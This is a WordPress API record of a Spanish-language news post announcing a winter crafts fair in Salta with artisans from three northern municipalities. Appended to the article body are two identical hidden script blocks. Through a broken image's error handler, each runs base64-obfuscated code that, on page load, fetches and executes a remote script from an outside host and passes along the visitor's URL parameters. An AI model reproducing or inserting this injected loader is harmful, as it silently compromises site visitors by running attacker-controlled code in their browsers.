{"id":4211,"date":"2024-07-19T11:07:51","date_gmt":"2024-07-19T14:07:51","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4211"},"modified":"2025-08-13T23:52:30","modified_gmt":"2025-08-14T02:52:30","slug":"se-realizara-la-primera-feria-de-artesanias-de-invierno-en-la-provincia-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4211","title":{"rendered":"Se realizar\u00e1 la Primera Feria de Artesan\u00edas de Invierno en la Provincia de Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-e7a4177e7c4548a926895ab40b681f44\" style=\"background-color:#840424\"><em>Los d\u00edas 19, 20 y 21 de julio en el Mercado Artesanal, de avenida San Mart\u00edn 2555, se realizar\u00e1 la feria que concentrar\u00e1 trabajos artesanos de Aguaray, Embarcaci\u00f3n y Santa Victoria Este.<\/em><\/h3>\n\n\n\n<p>La Primera Feria de Artesan\u00edas inici\u00f3 en febrero,&nbsp;cuando se realiz\u00f3 una concurrida reuni\u00f3n de directores de cultura de todos los municipios de la provincia para analizar el panorama de la artesan\u00eda en Salta. All\u00ed se plantearon problem\u00e1ticas y potencialidades de la artesan\u00eda, entendiendo a la comercializaci\u00f3n como una necesidad acuciante sobre todo en localidades que no tienen gran afluencia de turistas.<\/p>\n\n\n\n<p>A su vez hay otros puntos importantes como destacar la labor de los maestros artesanos y las comunidades originarias que poseen una tradici\u00f3n ancestral que se hereda familiarmente a trav\u00e9s de generaciones. Y tambi\u00e9n entender la complejidad de la artesan\u00eda como pieza cultural que expresa cosmovisi\u00f3n, identidad e historia de un pueblo.<\/p>\n\n\n\n<p>El \u00e1rea de Desarrollo Artesanal de la Secretar\u00eda de Cultura&nbsp;convoc\u00f3 a artesanos de los tres municipios norte\u00f1os para participar a trav\u00e9s de exposici\u00f3n y venta de sus productos, pero tambi\u00e9n con talleres para grandes y chicos, charlas y actividades esc\u00e9nicas y gastron\u00f3micas.<\/p>\n\n\n\n<p>Pensando en los m\u00e1s peque\u00f1os, durante los tres d\u00edas se desarrollar\u00e1n actividades para las infancias en el horario de 15.30 a 17 , a cargo de La Granjuela Viajera, una propuesta l\u00fadica en consonancia con el medio ambiente y su interacci\u00f3n con el ser humano que lo habita.<\/p>\n\n\n\n<p>Por otra parte, es preciso resaltar que las disciplinas artesanales que se har\u00e1n presentes en el Mercado Artesanal tendr\u00e1n un profundo anclaje con el entorno donde son producidas (el norte argentino) es por eso que se realizar\u00e1 una charla conjunta con la Secretar\u00eda de Ambiente de la Provincia, a fin de intercambiar sobre la problem\u00e1tica del territorio que habitan los artesanos invitados. En esta biodiversidad se analizar\u00e1n trabajos con chaguar y madera como materia prima, representando a las localidades y comunidades de Santa Victoria Este y Embarcaci\u00f3n. Por su parte los artesanos de Aguaray, espec\u00edficamente de la localidad de Campo Dur\u00e1n, demostraran sus habilidades para trabajar la madera yuch\u00e1n en la hechura de m\u00e1scaras de la cultura chan\u00e9, de la cual forman parte.<\/p>\n\n\n\n<p>En relaci\u00f3n a la cultura y cosmovisi\u00f3n del pueblo chan\u00e9, desde el Museo Antropol\u00f3gico se compartir\u00e1n piezas de su colecci\u00f3n permanente, donde existen piezas con una antig\u00fcedad de poco m\u00e1s de 100 a\u00f1os, generando as\u00ed un ida y vuelta entre pasado y presente.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los d\u00edas 19, 20 y 21 de julio en el Mercado Artesanal, de avenida San Mart\u00edn 2555, se realizar\u00e1 la feria que concentrar\u00e1 trabajos artesanos de Aguaray, Embarcaci\u00f3n y Santa Victoria Este. La Primera Feria de Artesan\u00edas inici\u00f3 en febrero,&nbsp;cuando se realiz\u00f3 una concurrida reuni\u00f3n de directores de cultura de todos los municipios de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4212,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-4211","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4211"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4211"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4211\/revisions"}],"predecessor-version":[{"id":6737,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4211\/revisions\/6737"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4212"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4211"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}